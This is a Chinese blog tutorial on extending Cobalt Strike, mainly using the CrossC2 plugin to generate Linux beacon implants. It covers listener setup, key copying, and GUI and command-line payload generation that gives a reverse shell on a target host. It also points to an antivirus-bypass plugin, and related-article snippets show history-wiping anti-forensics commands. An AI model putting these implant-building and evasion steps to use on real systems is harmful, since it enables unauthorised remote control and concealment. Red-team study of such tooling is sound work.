渗透测试框架进阶-拓展应用

最新推荐文章于 2024-06-01 09:51:40 发布
最新推荐文章于 2024-06-01 09:51:40 发布
阅读量964 收藏 3
点赞数
分类专栏: 渗透框架 文章标签: windows linux unix 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53747497/article/details/130458410
版权

CobaltStrike扩展脚本

扩展脚本简介

扩展是 Cobaltstrike 一个极为重要的模块,它有效地丰富了 Cobaltstrike 的功能。

选择菜单栏的 CobaltStrike > Script Manager(脚本管理器) ,点击 Load(加 载) ,然后选择要使用的 .cna 扩展文件即可。

扩展脚本插件

后渗透插件:梼杌 https://github.com/XZVB12/taowu-cobalt-strike-en 
免杀插件:bypassAV https://github.com/cseroad/bypassAV 
上线linux主机:CrossC2 https://github.com/gloxec/CrossC2

CS上线Linux主机

CrossC2介绍

Cross C2 项目是一个可以生成 Linux/Mac OS 的 Cobaltstrike beacon payload 的跨平台项目。

1.Linux & MacOS 支持无文件落地从内存中加载执行 动态库 或 可执行文件。
2.灵活自定义执行文件的数据返回类型,端口扫描,屏幕截图,键盘记录,口令凭证 等用户自定义开发实现更便捷。
3.自定义通信协议
4.支持横向移动
5.支持从内存加载脚本
6.Android & iPhone 支持

支持 CobaltStrike 对其他平台(Linux/MacOS/…)的安全评估,及包含Unix后渗透模 块开发支持

CrossC2安装

https://github.com/gloxec/CrossC2/releases/
先下载工具脚本

下载 CrossC2.cna、genCrossC2、CrossC2Kit

修改CrossC2.cna配置

修改 $CC2_PATH 路径为下载的 genCrossC2 真实路径 (因为在windows上搞,所以用的windows的exe)
修改 $CC2_BIN 为使用的 genCrossC2 程序名字

请添加图片描述

请添加图片描述

创建Listener与拷贝Key

第一步:创建Listener监听器 windows/beacon_https/reverse_https
第二步:拷贝teamserver目录的 .cobaltstrike.beacon_keys 文件到本地客户端目录

请添加图片描述

一定要先执行第一步,不然上线不了

先进行监听器的创建。

请添加图片描述

把那个key的文件下载到自己本机的windows上的cs4.7的目录下

请添加图片描述

添加CNA扩展脚本

去刚刚下载的cc2的那个文件夹里面找到cna的文件,添加 CrossC2.cna进去脚本管理器中 (如果成功安装,菜单栏会多出一项 CrossC2 )

请添加图片描述

功能扩展

打开下载的 CrossC2Kit 文件夹,添加 CrossC2Kit_Loader.cna , 包含内存加 载等其它功能

cs4.x 版本文件管理、进程列表功能缺失,必须使用此Loader来重启

请添加图片描述

CrossC2 上线测试

GUI生成木马

默认使用 cli 或 cna 提供的GUI功能生成 beacon

反向的:CrossC2 > Create CrossC2 Listener > Create reverse HTTPS Listener
正向的: CrossC2 > Create CrossC2 Listener > Create bind TCP Listener

请添加图片描述

在日志文件中可以看见具体的操作命令,第一部分是win.exe的程序路径,第二个是vps的ip和监听的端口,第三个是keys的路径 ,后面是linux的平台和架构,最后是木马的文件名字。

生成的木马文件在自己客户端的cs4.7的文件夹下面。

请添加图片描述

执行木马

生成的out文件丢去linux上去添加执行权限,然后开始执行,成功上线。默认是交互是ssh的一个交互,但是操作的命令和windows的不同,所以可以通过help来查看可以执行的命令。

请添加图片描述

请添加图片描述

Cli 生成木马

windows的命令行那种去生成木马

反向:
./genCrossC2.Win.exe Listener-IP Listener-Port .cobaltstrike.beacon_keys null Linux x64 cc2-test

正向:(要在linux中执行,好像只有4.1-4.4才能这样搞)
./genCrossC2.Linux 127.0.0.1 4444 .cobaltstrike.beacon_keys null Linux-bind x64 cc

请添加图片描述

可以在win.exe的目录找到木马,然后丢上去目标机器执行,会反弹回来shell。

请添加图片描述

操作过程中要注意如下几点:

  1. 需要改 cna 脚本中 genCrossC2 路径。
  2. 要使用 windows/beacon_https/reverse_https 监听器。
  3. 要把团队服务器下的隐藏文件 .cobaltstrike.beacon_keys 复制到本地 CS 目录下。
  4. 文件都丢到 CS 客户端根目录下,别搞二级目录。
  5. 生成的 payload 是一个 Linux 下的可执行 payload 和可执行文件, IP 和端 口对应 windows/beacon_https/reverse_https 监听器。
00zzz
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
软件测试流程进阶----两年软件测试总结
01-31
如果想让测试在公司的项目中发挥出它最大的价值,并不是招两个测试技术高手,或引入几个测试技术,而是测试技术对项目流程的渗透,以及测试流程的改进与完善。虽然,当然测试行业前景乐观,许多中小企业也都
渗透测试 - pentest-master
最新发布
06-29
渗透测试 unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 python -c 'import pty; pty.spawn("/bin/sh")' ssh -C -f -N -g -R ...
CS插件——
2301_76786857的博客
12-04 864
链接:https://pan.baidu.com/s/16uhzbtN8jnKrB4pkpkFkmQ?
使用CrossC2插件 上线Linux
Vicl1fe的博客
08-12 2039
前言 做红队的时候,就可以发现大部分服务器都是linux。而Windows的服务器比较少。还是更希望可以上线CS,方便管理。 环境 1.kali 2021 2.CS4.2 CrossC2 通过CrossC2插件可以实现上线CS。支持CS4.x版本上线,github链接如下。 https://github.com/gloxec/CrossC2/releases 我下载的是2.2.4-stable。因为我的环境是kali。所以我下载的是genCrossC2.Linux。然后再把Source code(zip
探索CrossC2 Kit:Unix平台的后渗透利器
gitblog_00055的博客
06-01 388
探索CrossC2 Kit:Unix平台的后渗透利器 项目地址:https://gitcode.com/CrossC2/CrossC2Kit 项目介绍 欢迎来到CrossC2 Kit的世界,这是一个专为Unix平台设计的后渗透扩展工具,基于强大的Aggressor Script脚本引擎。CrossC2 Kit的设计旨在模拟真实的红队操作,并且能够扩展CobaltStrike客户端的功能。它的核心是...
cobalt strike插件的使用(超细!)
技术超强的网络安全平台
12-27 1632
cobalt strike插件的使用(超细!)前言cobaltstrike作为渗透测试中不可缺少的利器,那么它到底厉害在哪里呢?在默认没有安装扩展的情况下可能功能并不是特别多,多数人会认为我已经基本掌握了cs的使用,但扩展就相当于我们的武器库,武器越多当然打起来也越爽,每次看别人的文章,发现自己的cs不是缺这就是缺那,压根没有办法实践,而且也很少有人会刻意说是哪个插件、哪里下载,这就给我们带来了非常大的困扰,索性就搜罗网上的插件进行全面加强自己的武器库,感谢大佬们分享的插件,以下使用的插件,将在文末提供。
Cobalt Strike 插件CrossC2(小白教程)
m0_63239459的博客
03-10 1808
cobaltstrike插件加载crossc2
CS联动MSF
m0_72125469的博客
05-27 575
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动。
Cobalt_Strike扩展插件
weixin_41082546的博客
08-30 3643
https://github.com/harleyQu1nn/AggressorScripts https://github.com/bluscreenofjeff/AggressorScripts https://github.com/michalkoczwara/aggressor_scripts_collection https://github.com/vysecurity/Aggress...
网络安全渗透测试报告模板-2023下载
09-05
适用于网络安全小白,渗透测试报告模板,doc文件格式可编辑可修改,无压缩密码; 适用于网络安全小白,渗透测试报告模板,doc文件格式可编辑可修改,无压缩密码;...适用于网络安全小白,渗透测试报告模板,doc
渗透测试流程图-PTES渗透测试执行标准
09-07
渗透测试流程图-PTES渗透测试执行标准,涉及渗透测试全流程,从前期准备交互阶段到情报收集、漏洞分析、渗透攻击到后渗透测试及报告。
taowu-cobalt-strike-3.0
01-08
Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用,当然可以结合Armitage进行使用。
cPlug:CobaltStrike插件可从Sifter内部启动和利用Cobalt Strike(本地或远程)
05-24
出口 s1l3nt78 死亡兔子集体因为枚举是关键 释放 @Codename: c @Version: .2 - Added functionality to start a teamserver hosted on a remote server [ Sifter的]最新版本的zip软件包可以从下载[ Sifter ]的最新.deb软件包也可以从下载较旧的版本可以在找到 筛选器插件 #发布的扩展 -Sifter的g扩展区提供GUI覆盖'->建立在eDEX-UI之上-F -Sifter的f扩展为Sifter提供了DanderFuzz开发插件'->由EquationGroup创建的框架,由The Shadow Brokers提供-M -Sifter的m扩展提供了恶意软件分析工具。 -C -Sifter的c扩展只是一个小脚本,允许将CobaltStrike添加到利用框架中。 (将不会提供Co
taowu-cobalt-strike
03-18
基于钴罢工平台的红队自动化框架 禁止交流与学习使用,请勿用于非法用途! 插件里面利用到的exp可以在网上搜集,不保证安全问题,请进行自主进行相关安全审查! 感谢提供英文翻译支持 感谢提供英语翻译支持 功能简介 公开版 完整版 贡献者 尖端 1.固有是一个原始的加学结合的项目,一开始就已经有了包容的属性,感谢github具有分享精神的大佬开源了这么多优秀的代码,站在巨人的上方上总是能看见更大的世界。 2.为了更好的维护该项目,现邀请这些项目的所有者共同参与维护开发,项目维护开发不限功能不限技术水平,只是只是输出一个whoami。参与维护的大佬可以直接将代码提交至github或者发送到邮箱或者加入知识星球进行交流。 3.参与维护开发的大佬请在邮件中注明自己的ID与github或者博客地址,以上内容将永久附在github项目页面以及关于模块一栏。 知识星球 分享与交流一线红队知
内网渗透工具CobaltStrike使用教程详解
qq_50854662的博客
12-15 2390
内网渗透工具CobaltStrike使用教程详解
『渗透基础』Cobalt Strike基础使用入门_Cobalt Strike联动msfconsole
Ho1aAs‘s Blog
06-21 984
首先给cs文件夹权限 启动cs服务器,,自定义密码,ip填公网/局域网,不可填127.0.0.1 默认端口50050 这里由于直接在服务器上面开客户端,所以可以填127.0.0.1,最好还是填局域网IP选择克隆网站 克隆目标网站作为钓鱼,勾选记录键盘 靶机访问并输入文字 即可截获输入内容先创建监听器 add一个http监听器,host选择客户端ipBeacon为内置的Listener,获取shell到CS上,Foreign为外部结合的Listener,常用于MSF的结合 创建成功攻击package有四种演示
Cobalt Strike利用CrossC2插件上线linux主机
3tefanie丶zhou的博客
03-10 1400
【言者只是说在嘴边,听者却要刻在心里。】
红日靶机vulnstack第二关
weixin_45715461的博客
06-18 2397
红日靶机vulnstack第二关
网络安全工具汇总(非常详细)零基础入门到精通,收藏这一篇就够了
Java癫疯的博客
05-14 915
网络安全工具汇总(非常详细)零基础入门到精通,收藏这一篇就够了

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值